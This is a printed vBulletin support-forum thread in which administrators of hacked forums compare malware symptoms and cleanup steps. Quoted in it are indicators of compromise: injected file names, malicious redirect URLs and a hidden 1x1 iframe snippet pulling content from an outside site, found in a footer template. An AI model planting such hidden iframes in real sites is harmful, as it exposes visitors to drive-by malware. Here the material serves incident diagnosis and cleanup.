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-   -   Site Contains Virus? Solution? (https://vborg.vbsupport.ru/showthread.php?t=275601)

hyperviperx99 12-17-2011 04:00 PM

Site Contains Virus? Solution?
Every time we go to the site, we get the warning saying: "fliprap.com contains content from, a site known to distribute malaware. Your computer may catch virus"

What should I do? Please help

Max Taxable 12-17-2011 04:07 PM

<a href="http://whatismyipaddress.com/ip/" target="_blank">http://whatismyipaddress.com/ip/</a>

Do you have third party content such as adverts?

Lynne 12-17-2011 06:21 PM

I'd guess you've been hacked. Have you contacted your host about this so they can help you figure out how this happened?

MegaManSec 12-23-2011 11:22 AM

Hi, it seems your site may have been compromised..

First step:
Run suspect files
Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions
if nothing is wrong in that, disable all plugins..
if that still does not fix it, export your database and search it for that IP address.
If that still doesnt work, check all your files for that IP.

prandah 12-23-2011 08:17 PM

maybe check you r script
or you use some iframe
or check run with clamav

sparksromeo 12-26-2011 02:04 AM


Originally Posted by loaep (Post 2280384)
Hi, it seems your site may have been compromised..

First step:
Run suspect files
Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions
if nothing is wrong in that, disable all plugins..
if that still does not fix it, export your database and search it for that IP address.
If that still doesnt work, check all your files for that IP.

I'm having a simular problem, my site appears to be falling apart .. When I run Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions, I sure get a lot of files where it says something like these are not reconized as vBulliten files. Question... what do I do with all the unreconized files that are scattered all over the site?
I also get pop-ups whenever a url is clicked, mostly all misc dot ru extensions.
I have V4.1.9

MegaManSec 12-26-2011 02:23 PM


Originally Posted by sparksromeo (Post 2281009)
I'm having a simular problem, my site appears to be falling apart .. When I run Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions, I sure get a lot of files where it says something like these are not reconized as vBulliten files. Question... what do I do with all the unreconized files that are scattered all over the site?
I also get pop-ups whenever a url is clicked, mostly all misc dot ru extensions.
I have V4.1.9

Could you paste what the output of suspect file versions ?

Lynne 12-26-2011 05:12 PM

If it says:
File not recognized as part of vBulletin
Then that usually just means it is not a default vbulletin file (most likely it is from a modification - you should recognize the names of all your modification files!)

If it says:
File does not contain expected contents
Then that means it recognizes the file (most likely it is a default vbulletin file) but that it has been modified.

sparksromeo 12-26-2011 07:18 PM


Originally Posted by loaep (Post 2281121)
Could you paste what the output of suspect file versions ?

Here go's


Help Suspect File Versions
Scanned 94 files./
blog_search.php File not recognized as part of vBulletin
commons.php File not recognized as part of vBulletin
coms.php File not recognized as part of vBulletin
google5691c1362bc37677.html File not recognized as part of vBulletin
hepad.htm File not recognized as part of vBulletin
jquery.php File not recognized as part of vBulletin
njiyn.htm File not recognized as part of vBulletin
npevz.htm File not recognized as part of vBulletin
okeox.htm File not recognized as part of vBulletin
product-vbh_newtabs10.xml File not recognized as part of vBulletin
tgbpo.htm File not recognized as part of vBulletin
Scanned 70 files./admincp
Scanned 3 files./archive
Scanned 101 files./clientscript
cms_textedit.js File not recognized as part of vBulletin
vbulletin-read-marker.js File not recognized as part of vBulletin
vbulletin-threadbit.js File not recognized as part of vBulletin
vbulletin_global.js File not recognized as part of vBulletin
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upgrade_400a1_indexes.php File not recognized as part of vBulletin
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statichtml.php File not recognized as part of vBulletin
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Scanned 5 files./packages/vbcms/search/result
statichtml.php File not recognized as part of vBulletin
Scanned 5 files./packages/vbcms/search/searchcontroller
newstatichtml.php File not recognized as part of vBulletin
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statichtml.php File not recognized as part of vBulletin
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sectionnav.php File not recognized as part of vBulletin
staticbb.php File not recognized as part of vBulletin
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Scanned 6 files./vb/view

Powered by vBulletin? Version 4.1.9 Copyright ? 2011 vBulletin Solutions, Inc. All rights reserved.

Veneti 12-26-2011 07:36 PM


Originally Posted by sparksromeo (Post 2281178)
hepad.htm File not recognized as part of vBulletin
njiyn.htm File not recognized as part of vBulletin
npevz.htm File not recognized as part of vBulletin
okeox.htm File not recognized as part of vBulletin
tgbpo.htm File not recognized as part of vBulletin

I'd suggest you take a careful look in cpanel (Where you host vbulletin) especially under the forum folder and look in those .htm files. If they have redirect code to other sites then these are bad news.

Assuming you have a good firewall you can probably spot them by simply typing yourdomain.com/forum/njiyn.htm etc etc depending on the root of your board.

ppgear 01-02-2012 09:03 PM

I have some of the same extra files as you:

But not the HTML files you have.

I'm still having trouble though. I followed the steps suggested:

1. Suspect File Versions. Done, found those extra PHP files above and renamed them.
2. Disabled all plugins (only VBseo)
3. Exported the database, searched the SQL for the offending domain names and IP addresses. None found.
4. Searched through my files for the domain names and IP addresses. None found. (Is it possible that it's encrypted in the files somehow so a search wouldn't find it?)
5. I don't have ads running, so that's not a problem.

Just wondering, do web servers cache files? So if I make a change and refresh (delete my own browser cache first), and I still get virus issues, is it possible the change DID work, except the server has it cached temporarily?

--------------- Added [DATE]1325542075[/DATE] at [TIME]1325542075[/TIME] ---------------

By the way, I found the offending domains/IPs by using Firefox/FireBug, in the "Net" tab it shows all the files requested, and there I saw some files being requested from other domains:

URL, Status, Domain, Size, Remote IP
GET http://44444vvvvv.mefound.com/dng311...cfc3b06a/0.php, 302 Found, 44444vvvvv.mefound.com, 20 B,
GET http://44444vvvvv.mefound.com/dng311...c3b06a/spl.php, 302 Found, 44444vvvvv.mefound.com, 20 B,
GET http://kokosina.in/t/go.php?sid=5, 302 Found, kokosina.in, 20 B,

These are the domains/IPs I searched for in the SQL and in the files. I also spotted those PHP files as weird because they had recent "modified" dates whereas the original files were untouched.

Lynne 01-02-2012 10:37 PM

Sometimes the added code is encrypted, so you can search for base64 in the plugins.

ForceHSS 01-02-2012 11:25 PM

</div><div style="display:none"><iframe src="http://www.cookaround.com/cook/robots.php" width="1" height="1"></iframe></div>

this iframe seems to be added check the footer template not sure if you want that there

--------------- Added [DATE]1325550426[/DATE] at [TIME]1325550426[/TIME] ---------------


--------------- Added [DATE]1325550515[/DATE] at [TIME]1325550515[/TIME] ---------------


ppgear 01-04-2012 01:17 AM

I ended up just replacing the files with a backed up version from before the hack. That was the quickest way, though I never found the hack.

myke2008 01-07-2012 04:44 PM

1 Attachment(s)

Originally Posted by ppgear (Post 2283582)
I ended up just replacing the files with a backed up version from before the hack. That was the quickest way, though I never found the hack.

Hello, I am also getting the attached virus pop up, did anyone figure out how to remove the virus yet? <--- address blocked, but its not the address for my site, what add on or plugin is causing this?

I disabled all the add on's and I still have the virus, I found all the suspect files the common.php, coms.php, jquery.php ect and deleted them already but I still have this virus issue, It sure would be nice to find the source of this and prevent it from happening in the future.


fmgrowit 01-07-2012 07:45 PM

I've been having a lot of issues with the same stuff. After several attempts to find the bugs, it was determined the server was compromised. I just switched servers with a trusted forum member here and the site was back up in two minutes and runs like a charm.

Just because someone offers hosting doesn't make them a good host...especially if they have clients with a grudge for ripping them off.

...I'm just saying pick your host carefully.

sureshbale 06-11-2012 06:32 AM

I heard that these malware scripts are getting in to your webserver by hacking your ftp password. What you have to do is find that malware files or code and delete. Submit your website to re-evaluation through google webmaster tools.
Hackers might get your saved password in ftp. So delete history and change the password immediately.
Recent times I am not using ftp. I am uploading zipped files directly through cpanel to prevent from hackers.
We should not blame your host regarding this issue. Hackers getting in to web server through your PC. So clean your PC with any good antivirus.

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Template Usage:
  • (1)ad_footer_end
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  • (1)printthread
  • (17)printthreadbit
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Phrase Groups Available:
  • global
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Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
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  • init_startup_session_setup_complete
  • cache_permissions
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  • fetch_threadinfo
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  • bbcode_fetch_tags
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  • bbcode_parse_complete_precache
  • bbcode_parse_complete
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  • printthread_complete